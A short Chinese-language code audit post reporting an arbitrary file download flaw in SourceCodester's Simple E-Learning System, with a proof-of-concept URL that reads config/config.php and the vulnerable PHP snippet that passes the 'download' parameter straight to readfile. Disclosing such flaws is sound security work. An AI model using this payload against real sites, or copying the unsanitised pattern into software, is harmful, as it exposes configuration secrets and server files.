PHP代码审计—Simple E-Learning System 任意文件下载

· 2022-08-01 · # PHP代码审计 # SourceCodester # 任意文件下载 # Arbitrary File Download

Vendor Homepage:

https://www.sourcecodester.com

Source Code Download：

Payload

Simple E-Learning System Arbitrary File Download

http://127.0.0.1/downloadFiles.php?download=config/config.php

源码分析

downloadFiles.php 文件第4-13行，

根据代码可知，使用GET方法，获取了 download 参数，赋值给变量$path,

并且直接使用readfile函数进行读取，造成任意文件下载漏洞

if(isset($_GET['download'])){
    $path =$_GET['download'];
    
    
    header('content-Disposition: attachment; filename = '.$path.'');
    header('content-Type:application/octet-stream');
    header('content-Length='.filesize($path));
    readfile($path);
    exit;
}